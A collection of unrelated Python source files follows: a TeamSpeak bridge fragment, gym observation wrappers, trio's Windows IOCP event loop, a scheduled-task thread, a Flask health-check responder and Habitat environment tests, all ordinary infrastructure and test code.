self._connected = False
self._socket.close()
self._send_thread.join()
self._recv_thread.join()
def running(self):
return self._running
def client_map(self):
return self._client_map
def channel_map(self):
return self._channel_map
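# Illustrative sketch (not part of the original bridge): the ServerQuery escaping
# implemented by encode()/decode() above turns spaces, pipes and control characters
# into backslash sequences, so a plain chat message round-trips. The credentials
# below are hypothetical; nothing is sent over the socket.
def _example_escaping():
    conn = TSConnection('localhost', 10011, 'bridge', 'serveradmin', 'secret')
    raw = 'hello world | with a pipe'
    assert conn.encode(raw) == 'hello\\sworld\\s\\p\\swith\\sa\\spipe'
    assert conn.decode(conn.encode(raw)) == raw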
|
wrapper.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
from collections import defaultdict
import gym
import numpy as np
import queue
import threading
class CounterWrapper(gym.Wrapper):
def __init__(self, env, state_counter="none"):
        # initialize the state counter
self.state_counter = state_counter
if self.state_counter != "none":
self.state_count_dict = defaultdict(int)
# this super() goes to the parent of the particular task, not to object
super().__init__(env)
def step(self, action):
# add state counting to step function if desired
step_return = self.env.step(action)
if self.state_counter == "none":
# do nothing
return step_return
obs, reward, done, info = step_return
if self.state_counter == "ones":
# treat every state as unique
state_visits = 1
elif self.state_counter == "coordinates":
# use the location of the agent in the dungeon to accumulate visits
features = obs["blstats"]
x = features[0]
y = features[1]
d = features[12]
coord = (d, x, y)
self.state_count_dict[coord] += 1
state_visits = self.state_count_dict[coord]
else:
raise NotImplementedError("state_counter=%s" % self.state_counter)
obs.update(state_visits=np.array([state_visits]))
if done:
self.state_count_dict.clear()
return step_return
def reset(self, wizkit_items=None):
# reset state counter when env resets
obs = self.env.reset(wizkit_items=wizkit_items)
if self.state_counter != "none":
self.state_count_dict.clear()
# current state counts as one visit
obs.update(state_visits=np.array([1]))
return obs
class CropWrapper(gym.Wrapper):
def __init__(self, env, h=9, w=9, pad=0, keys=("tty_chars", "tty_colors")):
super().__init__(env)
self.env = env
self.h = h
self.w = w
self.pad = pad
self.keys = keys
assert self.h % 2 == 1
assert self.w % 2 == 1
self.last_observation = None
self._actions = self.env._actions
def render(self, mode="human", crop=True):
self.env.render()
obs = self.last_observation
tty_chars_crop = obs["tty_chars_crop"]
tty_colors_crop = obs["tty_colors_crop"]
rendering = self.env.get_tty_rendering(
tty_chars_crop, tty_colors_crop, print_guides=True
)
print(rendering)
def step(self, action):
next_state, reward, done, info = self.env.step(action)
dh = self.h // 2
dw = self.w // 2
(y, x) = next_state["tty_cursor"]
x += dw
y += dh
for key in self.keys:
obs = next_state[key]
obs = np.pad(
obs,
pad_width=(dw, dh),
mode="constant",
constant_values=self.pad,
)
next_state[key + "_crop"] = obs[
y - dh : y + dh + 1, x - dw : x + dw + 1
]
self.last_observation = next_state
return next_state, reward, done, info
def reset(self, wizkit_items=None):
obs = self.env.reset(wizkit_items=wizkit_items)
obs["tty_chars_crop"] = np.zeros((self.h, self.w), dtype=np.uint8)
obs["tty_colors_crop"] = np.zeros((self.h, self.w), dtype=np.int8)
self.last_observation = obs
return obs
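# Illustrative sketch (standalone, not used by the wrappers above): a simplified,
# symmetric version of the cropping idea in CropWrapper.step -- pad the screen,
# shift the cursor into padded coordinates, then slice an (h, w) window centred
# on it. The 5x5 "screen" is made up.
def _example_crop(h=3, w=3, pad=0):
    screen = np.arange(25).reshape(5, 5)
    y, x = 2, 4                     # cursor near the right edge
    dh, dw = h // 2, w // 2
    padded = np.pad(screen, pad_width=((dh, dh), (dw, dw)), constant_values=pad)
    yc, xc = y + dh, x + dw         # cursor position after padding
    crop = padded[yc - dh:yc + dh + 1, xc - dw:xc + dw + 1]
    assert crop.shape == (h, w)
    return crop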
class PrevWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.env = env
self.last_observation = None
self._actions = self.env._actions
def step(self, action):
next_state, reward, done, info = self.env.step(action)
next_state["prev_reward"] = np.array([reward], dtype=np.float32)
next_state["prev_action"] = np.array([action], dtype=np.uint8)
self.last_observation = next_state
return next_state, reward, done, info
def reset(self, wizkit_items=None):
obs = self.env.reset(wizkit_items=wizkit_items)
obs["prev_reward"] = np.zeros(1, dtype=np.float32)
obs["prev_action"] = np.zeros(1, dtype=np.uint8)
self.last_observation = obs
return obs
def target(resetqueue, readyqueue):
while True:
env = resetqueue.get()
if env is None:
return
obs = env.reset()
readyqueue.put((obs, env))
class CachedEnvWrapper(gym.Env):
def __init__(self, envs, num_threads=2):
self._envs = envs
# This could alternatively also use concurrent.futures. I hesitate to do
# that as futures.wait would have me deal with sets all the time where they
# are really not necessary.
self._resetqueue = queue.SimpleQueue()
self._readyqueue = queue.SimpleQueue()
self._threads = [
threading.Thread(
target=target, args=(self._resetqueue, self._readyqueue)
)
for _ in range(num_threads)
]
for t in self._threads:
t.start()
for env in envs[1:]:
self._resetqueue.put(env)
self._env = envs[0]
def reset(self):
self._resetqueue.put(self._env)
obs, self._env = self._readyqueue.get()
return obs
def step(self, action):
return self._env.step(action)
def close(self):
for _ in self._threads:
self._resetqueue.put(None)
for t in self._threads:
t.join()
for env in self._envs:
env.close()
def seed(self, seed=None):
self._env.seed(seed)
def unwrapped(self):
return self._env
def __str__(self):
return "<CachedEnvWrapper envs=%s>" % [str(env) for env in self._envs]
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
return False # Propagate exception.
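# Illustrative sketch (hypothetical _DummyEnv, not part of the original file):
# CachedEnvWrapper keeps the spare environments resetting in background threads,
# so reset() can immediately hand back an environment that is already reset while
# the one just used goes back into the queue.
class _DummyEnv(gym.Env):
    def reset(self):
        return 0
    def step(self, action):
        return 0, 0.0, True, {}
    def close(self):
        pass
def _example_cached_env_wrapper():
    with CachedEnvWrapper([_DummyEnv() for _ in range(3)], num_threads=2) as env:
        obs = env.reset()
        obs, reward, done, info = env.step(0)
    return done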
|
_io_windows.py
|
import math
import itertools
from contextlib import contextmanager
import socket as stdlib_socket
from select import select
import threading
from collections import deque
import signal
import attr
from .. import _core
from . import _public, _hazmat
from ._wakeup_socketpair import WakeupSocketpair
from ._windows_cffi import (
ffi, kernel32, INVALID_HANDLE_VALUE, raise_winerror, ErrorCodes,
)
# There's a lot to be said about the overall design of a Windows event
# loop. See
#
# https://github.com/python-trio/trio/issues/52
#
# for discussion. This now just has some lower-level notes:
#
# How IOCP fits together:
# - each notification event (OVERLAPPED_ENTRY) contains:
# - the "completion key" (an integer)
# - pointer to OVERLAPPED
# - dwNumberOfBytesTransferred
# - and in addition, for regular I/O, the OVERLAPPED structure gets filled in
# with:
# - result code (named "Internal")
# - number of bytes transferred (named "InternalHigh"); redundant with
# dwNumberOfBytesTransferred *if* this is a regular I/O event.
#
# There are also some other entries in OVERLAPPED which only matter on input:
# - Offset and OffsetHigh which are inputs to {Read,Write}File and
# otherwise always zero
# - hEvent which is for if you aren't using IOCP; we always set it to zero.
#
# PostQueuedCompletionStatus: lets you set the 3 magic scalars to whatever you
# want.
#
# Regular I/O events: these are identified by the pointer-to-OVERLAPPED. The
# "completion key" is a property of a particular handle being operated on that
# is set when associating the handle with the IOCP. We don't use it, so should
# always set it to zero.
#
# Job notifications: effectively uses PostQueuedCompletionStatus, the
# "completion key" is used to identify which job we're talking about, and the
# other two scalars are overloaded to contain arbitrary data.
#
# So our strategy is:
# - when binding handles to the IOCP, we always set the completion key to 0.
# when dispatching received events, when the completion key is 0 we dispatch
# based on lpOverlapped
# - thread-safe wakeup uses completion key 1
# - other completion keys are available for user use
# handles:
# - for now we'll just use 1 thread per handle, should file a QoI bug to
# multiplex multiple handles onto the same thread
# - cancel via QueueUserAPC
# - I'm a little nervous about the callback to QueueUserAPC... cffi's
# ABI-level callbacks require executable memory and who knows how happy the
# re-enter-Python code will be about being executed in APC context. (I guess
# APC context here is always "on a thread running Python code but that has
# dropped the GIL", so maybe there's no issue?)
# - on 32-bit windows, Sleep makes a great QueueUserAPC callback...
#   - WakeByAddressAll and WakeByAddressSingle have the right signature
# everywhere!
# - there are also a bunch that take a *-sized arg and return BOOL,
# e.g. CloseHandle, SetEvent, etc.
# - or free() from the CRT (free(NULL) is a no-op says the spec)
# - but do they have the right calling convention? QueueUserAPC wants an
# APCProc which is VOID CALLBACK f(ULONG_PTR)
# CALLBACK = __stdcall
# ugh, and free is not annotated, so probably __cdecl
# but most of the rest are WINAPI which is __stdcall
# ...but, on x86-64 calling convention distinctions are erased! so we can
# do Sleep on x86-32 and free on x86-64...
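# Rough usage sketch for the "other completion keys are available for user
# use" case above (hypothetical caller code; it relies only on current_iocp()
# and monitor_completion_key() defined further down):
#
#     with monitor_completion_key() as (key, queue):
#         # Hand (current_iocp(), key) to some foreign code, which then calls
#         #     PostQueuedCompletionStatus(iocp, nbytes, key, lpOverlapped)
#         # Each such call shows up on `queue` as a CompletionKeyEventInfo
#         # carrying dwNumberOfBytesTransferred and lpOverlapped (as an int).
#         ...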
def _check(success):
if not success:
raise_winerror()
return success
def _handle(obj):
# For now, represent handles as either cffi HANDLEs or as ints. If you
# try to pass in a file descriptor instead, it's not going to work
# out. (For that msvcrt.get_osfhandle does the trick, but I don't know if
# we'll actually need that for anything...) For sockets this doesn't
# matter, Python never allocates an fd. So let's wait until we actually
# encounter the problem before worrying about it.
if type(obj) is int:
return ffi.cast("HANDLE", obj)
else:
return obj
@attr.s(frozen=True)
class _WindowsStatistics:
tasks_waiting_overlapped = attr.ib()
completion_key_monitors = attr.ib()
tasks_waiting_socket_readable = attr.ib()
tasks_waiting_socket_writable = attr.ib()
iocp_backlog = attr.ib()
backend = attr.ib(default="windows")
@attr.s(frozen=True)
class CompletionKeyEventInfo:
lpOverlapped = attr.ib()
dwNumberOfBytesTransferred = attr.ib()
class WindowsIOManager:
def __init__(self):
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363862(v=vs.85).aspx
self._closed = True
self._iocp = _check(kernel32.CreateIoCompletionPort(
INVALID_HANDLE_VALUE, ffi.NULL, 0, 0))
self._closed = False
self._iocp_queue = deque()
self._iocp_thread = None
self._overlapped_waiters = {}
self._completion_key_queues = {}
# Completion key 0 is reserved for regular IO events
self._completion_key_counter = itertools.count(1)
# {stdlib socket object: task}
# except that wakeup socket is mapped to None
self._socket_waiters = {"read": {}, "write": {}}
self._main_thread_waker = WakeupSocketpair()
self._socket_waiters["read"][self._main_thread_waker.wakeup_sock] = None
# This is necessary to allow control-C to interrupt select().
# https://github.com/python-trio/trio/issues/42
if threading.current_thread() == threading.main_thread():
fileno = self._main_thread_waker.write_sock.fileno()
self._old_signal_wakeup_fd = signal.set_wakeup_fd(fileno)
def statistics(self):
return _WindowsStatistics(
tasks_waiting_overlapped=len(self._overlapped_waiters),
completion_key_monitors=len(self._completion_key_queues),
tasks_waiting_socket_readable=len(self._socket_waiters["read"]),
tasks_waiting_socket_writable=len(self._socket_waiters["write"]),
iocp_backlog=len(self._iocp_queue),
)
def close(self):
if not self._closed:
self._closed = True
_check(kernel32.CloseHandle(self._iocp))
if self._iocp_thread is not None:
self._iocp_thread.join()
self._main_thread_waker.close()
if threading.current_thread() == threading.main_thread():
signal.set_wakeup_fd(self._old_signal_wakeup_fd)
def __del__(self):
# Need to make sure we clean up self._iocp (raw handle) and the IOCP
# thread.
self.close()
def handle_io(self, timeout):
# Step 0: the first time through, initialize the IOCP thread
if self._iocp_thread is None:
# The rare non-daemonic thread -- close() should always be called,
# even on error paths, and we want to join it there.
self._iocp_thread = threading.Thread(
target=self._iocp_thread_fn, name="trio-IOCP")
self._iocp_thread.start()
# Step 1: select for sockets, with the given timeout.
# If there are events queued from the IOCP thread, then the timeout is
# implicitly reduced to 0 b/c the wakeup socket has pending data in
# it.
def socket_ready(what, sock, result=_core.Value(None)):
task = self._socket_waiters[what].pop(sock)
_core.reschedule(task, result)
def socket_check(what, sock):
try:
select([sock], [sock], [sock], 0)
except OSError as exc:
socket_ready(what, sock, result=_core.Error(exc))
def do_select():
r_waiting = self._socket_waiters["read"]
w_waiting = self._socket_waiters["write"]
# We select for exceptional conditions on the writable set because
# on Windows, a failed non-blocking connect shows up as
# "exceptional". Everyone else uses "writable" for this, so we
# normalize it.
r, w1, w2 = select(r_waiting, w_waiting, w_waiting, timeout)
return r, set(w1 + w2)
try:
r, w = do_select()
except OSError:
# Some socket was closed or similar. Track it down and get rid of
# it.
for what in ["read", "write"]:
for sock in self._socket_waiters[what]:
socket_check(what, sock)
r, w = do_select()
for sock in r:
if sock is not self._main_thread_waker.wakeup_sock:
socket_ready("read", sock)
for sock in w:
socket_ready("write", sock)
# Step 2: drain the wakeup socket.
# This must be done before checking the IOCP queue.
self._main_thread_waker.drain()
# Step 3: process the IOCP queue. If new events arrive while we're
# processing the queue then we leave them for next time.
        # XX should probably have some sort of emergency bail out if the queue
# gets too long?
for _ in range(len(self._iocp_queue)):
msg = self._iocp_queue.popleft()
if isinstance(msg, BaseException):
# IOCP thread encountered some unexpected error -- give up and
# let the user know.
raise msg
batch, received = msg
for i in range(received):
entry = batch[i]
if entry.lpCompletionKey == 0:
# Regular I/O event, dispatch on lpOverlapped
waiter = self._overlapped_waiters.pop(entry.lpOverlapped)
_core.reschedule(waiter)
else:
# dispatch on lpCompletionKey
queue = self._completion_key_queues[entry.lpCompletionKey]
info = CompletionKeyEventInfo(
lpOverlapped=
int(ffi.cast("uintptr_t", entry.lpOverlapped)),
dwNumberOfBytesTransferred=
entry.dwNumberOfBytesTransferred)
queue.put_nowait(info)
def _iocp_thread_fn(self):
# This thread sits calling GetQueuedCompletionStatusEx forever. To
# signal that it should shut down, the main thread just closes the
# IOCP, which causes GetQueuedCompletionStatusEx to return with an
# error:
IOCP_CLOSED_ERRORS = {
# If the IOCP is closed while we're blocked in
# GetQueuedCompletionStatusEx, then we get this error:
ErrorCodes.ERROR_ABANDONED_WAIT_0,
# If the IOCP is already closed when we initiate a
# GetQueuedCompletionStatusEx, then we get this error:
ErrorCodes.ERROR_INVALID_HANDLE,
}
while True:
max_events = 1
batch = ffi.new("OVERLAPPED_ENTRY[]", max_events)
received = ffi.new("PULONG")
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa364988(v=vs.85).aspx
try:
_check(kernel32.GetQueuedCompletionStatusEx(
self._iocp, batch, max_events, received, 0xffffffff, 0))
except OSError as exc:
if exc.winerror in IOCP_CLOSED_ERRORS:
# The IOCP handle was closed; time to shut down.
return
else:
self._iocp_queue.append(exc)
return
self._iocp_queue.append((batch, received[0]))
self._main_thread_waker.wakeup_thread_and_signal_safe()
@_public
@_hazmat
def current_iocp(self):
return int(ffi.cast("uintptr_t", self._iocp))
@_public
@_hazmat
def register_with_iocp(self, handle):
        handle = _handle(handle)
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363862(v=vs.85).aspx
_check(kernel32.CreateIoCompletionPort(handle, self._iocp, 0, 0))
@_public
@_hazmat
async def wait_overlapped(self, handle, lpOverlapped):
        handle = _handle(handle)
if isinstance(lpOverlapped, int):
lpOverlapped = ffi.cast("LPOVERLAPPED", lpOverlapped)
if lpOverlapped in self._overlapped_waiters:
raise RuntimeError(
"another task is already waiting on that lpOverlapped")
task = _core.current_task()
self._overlapped_waiters[lpOverlapped] = task
raise_cancel = None
def abort(raise_cancel_):
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363792(v=vs.85).aspx
# the _check here is probably wrong -- I guess we should just
# ignore errors? but at least it will let us learn what errors are
# possible -- the docs are pretty unclear.
nonlocal raise_cancel
raise_cancel = raise_cancel_
_check(kernel32.CancelIoEx(handle, lpOverlapped))
return _core.Abort.FAILED
await _core.yield_indefinitely(abort)
if lpOverlapped.Internal != 0:
if lpOverlapped.Internal == ErrorCodes.ERROR_OPERATION_ABORTED:
assert raise_cancel is not None
raise_cancel()
else:
raise_winerror(lpOverlapped.Internal)
@_public
@_hazmat
@contextmanager
def monitor_completion_key(self):
key = next(self._completion_key_counter)
queue = _core.UnboundedQueue()
self._completion_key_queues[key] = queue
try:
yield (key, queue)
finally:
del self._completion_key_queues[key]
async def _wait_socket(self, which, sock):
# Using socket objects rather than raw handles gives better behavior
# if someone closes the socket while another task is waiting on it. If
# we just kept the handle, it might be reassigned, and we'd be waiting
# on who-knows-what. The socket object won't be reassigned, and it
# switches its fileno() to -1, so we can detect the offending socket
# and wake the appropriate task. This is a pretty minor benefit (I
# think it can only make a difference if someone is closing random
# sockets in another thread? And on unix we don't handle this case at
# all), but hey, why not.
if type(sock) is not stdlib_socket.socket:
raise TypeError("need a stdlib socket")
if sock in self._socket_waiters[which]:
raise RuntimeError(
"another task is already waiting to {} this socket"
.format(which))
self._socket_waiters[which][sock] = _core.current_task()
def abort(_):
del self._socket_waiters[which][sock]
return _core.Abort.SUCCEEDED
await _core.yield_indefinitely(abort)
@_public
@_hazmat
async def wait_socket_readable(self, sock):
await self._wait_socket("read", sock)
@_public
@_hazmat
async def wait_socket_writable(self, sock):
await self._wait_socket("write", sock)
# This has cffi-isms in it and is untested... but it demonstrates the
# logic we'll want when we start actually using overlapped I/O.
#
# @_public
# @_hazmat
# async def perform_overlapped(self, handle, submit_fn):
# # submit_fn(lpOverlapped) submits some I/O
# # it may raise an OSError with ERROR_IO_PENDING
# await _core.yield_if_cancelled()
# self.register_with_iocp(handle)
# lpOverlapped = ffi.new("LPOVERLAPPED")
# try:
# submit_fn(lpOverlapped)
# except OSError as exc:
# if exc.winerror != Error.ERROR_IO_PENDING:
# await _core.yield_briefly_no_cancel()
# raise
# await self.wait_overlapped(handle, lpOverlapped)
# return lpOverlapped
|
asyncscheduledtask.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
from threading import Thread
from log import LogFactory
log = LogFactory().get_log(__name__)
class AbstractAsyncScheduledTask:
"""
Exposes the contract to follow to implement a scheduled task to be executed by the ScheduledExecutor
"""
def execute_task(self):
"""
Override this method and implement the task to be executed by the ScheduledExecutor with a specified
interval.
"""
raise NotImplementedError
class ScheduledExecutor(Thread):
"""
Executes a given task with a given interval until being terminated
"""
def __init__(self, delay, task):
"""
Creates a ScheduledExecutor thread to handle interval based repeated execution of a given task of type
AbstractAsyncScheduledTask
        :param int delay: The interval, in seconds, to keep between executions
        :param AbstractAsyncScheduledTask task: The task to be executed at each interval
:return:
"""
Thread.__init__(self)
self.delay = delay
""" :type : int """
self.task = task
""" :type : AbstractAsyncScheduledTask """
self.terminated = False
""" :type : bool """
self.setName("ScheduledExecutorForTask%s" % self.task.__class__.__name__)
self.setDaemon(True)
log.debug("Created a ScheduledExecutor thread for task %s" % self.task.__class__.__name__)
def run(self):
"""
Start the scheduled task with a sleep time of delay in between
:return:
"""
while not self.terminated:
time.sleep(self.delay)
if not self.terminated:
task_thread = Thread(target=self.task.execute_task)
task_thread.setName("WorkerThreadForTask%s" % self.task.__class__.__name__)
task_thread.setDaemon(True)
log.debug("Starting a worker thread for the Scheduled Executor for task %s" % self.task.__class__.__name__)
task_thread.start()
def terminate(self):
"""
        Terminate the scheduled task. Termination can take up to 'delay' seconds to take effect.
:return: void
"""
self.terminated = True
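# A minimal usage sketch (HealthCheckTask is a hypothetical subclass shown
# here only for illustration):
#
#     class HealthCheckTask(AbstractAsyncScheduledTask):
#         def execute_task(self):
#             log.debug("Running scheduled health check")
#
#     executor = ScheduledExecutor(delay=30, task=HealthCheckTask())
#     executor.start()      # inherited from Thread; starts the sleep/execute loop
#     ...
#     executor.terminate()  # no further executions after at most `delay` seconds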
|
__init__.py
|
import functools
import time
from threading import Thread
import os
from flask import Flask
def run_function_in_background(target):
t = Thread(target=target)
t.setDaemon(True)
t.start()
def http_transponder(port):
app = Flask(__name__)
@app.route("/")
def main():
return 'I am the health check transponder'
@app.route("/ping")
def ping():
return 'pong'
@app.route("/are_you_ok")
def are_you_ok():
return "I'm OK"
app.run(host='0.0.0.0', port=port)
# try to get the port config from the environment
http_port = int(os.getenv('HEALTH_CHECK_TRANSPONDER_PORT', 9998))  # env values are strings
run_health_check_transponder_in_background = functools.partial(
run_function_in_background,
functools.partial(http_transponder, port=http_port)
)
if __name__ == "__main__":
run_health_check_transponder_in_background()
for _ in range(100):
time.sleep(1)
print('.', end='', flush=True)
|
test_habitat_env.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import numpy as np
import pytest
import habitat
from habitat.config.default import get_config
from habitat.core.simulator import AgentState
from habitat.datasets.pointnav.pointnav_dataset import PointNavDatasetV1
from habitat.sims.habitat_simulator import SimulatorActions
from habitat.tasks.nav.nav_task import NavigationEpisode, NavigationGoal
CFG_TEST = "configs/test/habitat_all_sensors_test.yaml"
NUM_ENVS = 4
class DummyRLEnv(habitat.RLEnv):
def __init__(self, config, dataset=None, env_ind=0):
super(DummyRLEnv, self).__init__(config, dataset)
self._env_ind = env_ind
def get_reward_range(self):
return -1.0, 1.0
def get_reward(self, observations):
return 0.0
def get_done(self, observations):
done = False
if self._env.episode_over:
done = True
return done
def get_info(self, observations):
return {}
def get_env_ind(self):
return self._env_ind
def set_env_ind(self, new_env_ind):
self._env_ind = new_env_ind
def _load_test_data():
configs = []
datasets = []
for i in range(NUM_ENVS):
config = get_config(CFG_TEST)
if not PointNavDatasetV1.check_config_paths_exist(config.DATASET):
pytest.skip("Please download Habitat test data to data folder.")
datasets.append(
habitat.make_dataset(
id_dataset=config.DATASET.TYPE, config=config.DATASET
)
)
config.defrost()
config.SIMULATOR.SCENE = datasets[-1].episodes[0].scene_id
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
config.freeze()
configs.append(config)
return configs, datasets
def _vec_env_test_fn(configs, datasets, multiprocessing_start_method):
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
envs = habitat.VectorEnv(
env_fn_args=env_fn_args,
multiprocessing_start_method=multiprocessing_start_method,
)
envs.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for _ in range(2 * configs[0].ENVIRONMENT.MAX_EPISODE_STEPS):
observations = envs.step(np.random.choice(non_stop_actions, num_envs))
assert len(observations) == num_envs
def test_vectorized_envs_forkserver():
configs, datasets = _load_test_data()
_vec_env_test_fn(configs, datasets, "forkserver")
def test_vectorized_envs_spawn():
configs, datasets = _load_test_data()
_vec_env_test_fn(configs, datasets, "spawn")
def _fork_test_target(configs, datasets):
_vec_env_test_fn(configs, datasets, "fork")
def test_vectorized_envs_fork():
configs, datasets = _load_test_data()
# 'fork' works in a process that has yet to use the GPU
    # this test spawns a new python instance, which allows us to fork
mp_ctx = mp.get_context("spawn")
p = mp_ctx.Process(target=_fork_test_target, args=(configs, datasets))
p.start()
p.join()
assert p.exitcode == 0
def test_with_scope():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
with habitat.VectorEnv(
env_fn_args=env_fn_args, multiprocessing_start_method="forkserver"
) as envs:
envs.reset()
assert envs._is_closed
def test_threaded_vectorized_env():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
envs = habitat.ThreadedVectorEnv(env_fn_args=env_fn_args)
envs.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for i in range(2 * configs[0].ENVIRONMENT.MAX_EPISODE_STEPS):
observations = envs.step(np.random.choice(non_stop_actions, num_envs))
assert len(observations) == num_envs
envs.close()
def test_env():
config = get_config(CFG_TEST)
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
env = habitat.Env(config=config, dataset=None)
env.episodes = [
NavigationEpisode(
episode_id="0",
scene_id=config.SIMULATOR.SCENE,
start_position=[-3.0133917, 0.04623024, 7.3064547],
start_rotation=[0, 0.163276, 0, 0.98658],
goals=[NavigationGoal([-3.0133917, 0.04623024, 7.3064547])],
info={"geodesic_distance": 0.001},
)
]
env.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for _ in range(config.ENVIRONMENT.MAX_EPISODE_STEPS):
act = np.random.choice(non_stop_actions)
env.step(act)
# check for steps limit on environment
assert env.episode_over is True, (
"episode should be over after " "max_episode_steps"
)
env.reset()
env.step(SimulatorActions.STOP.value)
# check for STOP action
assert env.episode_over is True, (
"episode should be over after STOP " "action"
)
env.close()
def make_rl_env(config, dataset, rank: int = 0):
"""Constructor for default habitat Env.
:param config: configurations for environment
:param dataset: dataset for environment
:param rank: rank for setting seeds for environment
:return: constructed habitat Env
"""
env = DummyRLEnv(config=config, dataset=dataset)
env.seed(config.SEED + rank)
return env
def test_rl_vectorized_envs():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
envs = habitat.VectorEnv(make_env_fn=make_rl_env, env_fn_args=env_fn_args)
envs.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for i in range(2 * configs[0].ENVIRONMENT.MAX_EPISODE_STEPS):
outputs = envs.step(np.random.choice(non_stop_actions, num_envs))
observations, rewards, dones, infos = [list(x) for x in zip(*outputs)]
assert len(observations) == num_envs
assert len(rewards) == num_envs
assert len(dones) == num_envs
assert len(infos) == num_envs
tiled_img = envs.render(mode="rgb_array")
new_height = int(np.ceil(np.sqrt(NUM_ENVS)))
new_width = int(np.ceil(float(NUM_ENVS) / new_height))
h, w, c = observations[0]["rgb"].shape
assert tiled_img.shape == (
h * new_height,
w * new_width,
c,
), "vector env render is broken"
if (i + 1) % configs[0].ENVIRONMENT.MAX_EPISODE_STEPS == 0:
assert all(dones), "dones should be true after max_episode steps"
envs.close()
def test_rl_env():
config = get_config(CFG_TEST)
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
env = DummyRLEnv(config=config, dataset=None)
env.episodes = [
NavigationEpisode(
episode_id="0",
scene_id=config.SIMULATOR.SCENE,
start_position=[-3.0133917, 0.04623024, 7.3064547],
start_rotation=[0, 0.163276, 0, 0.98658],
goals=[NavigationGoal([-3.0133917, 0.04623024, 7.3064547])],
info={"geodesic_distance": 0.001},
)
]
done = False
observation = env.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for _ in range(config.ENVIRONMENT.MAX_EPISODE_STEPS):
observation, reward, done, info = env.step(
np.random.choice(non_stop_actions)
)
# check for steps limit on environment
assert done is True, "episodes should be over after max_episode_steps"
env.reset()
observation, reward, done, info = env.step(SimulatorActions.STOP.value)
assert done is True, "done should be true after STOP action"
env.close()
def _make_dummy_env_func(config, dataset, id):
return DummyRLEnv(config=config, dataset=dataset, env_ind=id)
def test_vec_env_call_func():
configs, datasets = _load_test_data()
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
true_env_ids = list(range(num_envs))
envs = habitat.VectorEnv(
make_env_fn=_make_dummy_env_func,
env_fn_args=env_fn_args,
multiprocessing_start_method="forkserver",
)
envs.reset()
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
env_id = envs.call_at(1, "get_env_ind")
assert env_id == true_env_ids[1]
envs.call_at(2, "set_env_ind", [20])
true_env_ids[2] = 20
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.call_at(2, "set_env_ind", [2])
true_env_ids[2] = 2
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.pause_at(3)
true_env_ids.pop(3)
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.pause_at(0)
true_env_ids.pop(0)
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == true_env_ids
envs.resume_all()
env_ids = envs.call(["get_env_ind"] * num_envs)
assert env_ids == list(range(num_envs))
envs.close()
# TODO Bring back this test for the greedy follower
@pytest.mark.skip
def test_action_space_shortest_path():
config = get_config()
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
env = habitat.Env(config=config, dataset=None)
# action space shortest path
source_position = env.sim.sample_navigable_point()
angles = [x for x in range(-180, 180, config.SIMULATOR.TURN_ANGLE)]
angle = np.radians(np.random.choice(angles))
source_rotation = [0, np.sin(angle / 2), 0, np.cos(angle / 2)]
source = AgentState(source_position, source_rotation)
reachable_targets = []
unreachable_targets = []
while len(reachable_targets) < 5:
position = env.sim.sample_navigable_point()
angles = [x for x in range(-180, 180, config.SIMULATOR.TURN_ANGLE)]
angle = np.radians(np.random.choice(angles))
rotation = [0, np.sin(angle / 2), 0, np.cos(angle / 2)]
if env.sim.geodesic_distance(source_position, position) != np.inf:
reachable_targets.append(AgentState(position, rotation))
while len(unreachable_targets) < 3:
position = env.sim.sample_navigable_point()
# Change height of the point to make it unreachable
position[1] = 100
angles = [x for x in range(-180, 180, config.SIMULATOR.TURN_ANGLE)]
angle = np.radians(np.random.choice(angles))
rotation = [0, np.sin(angle / 2), 0, np.cos(angle / 2)]
if env.sim.geodesic_distance(source_position, position) == np.inf:
unreachable_targets.append(AgentState(position, rotation))
targets = reachable_targets
shortest_path1 = env.sim.action_space_shortest_path(source, targets)
assert shortest_path1 != []
targets = unreachable_targets
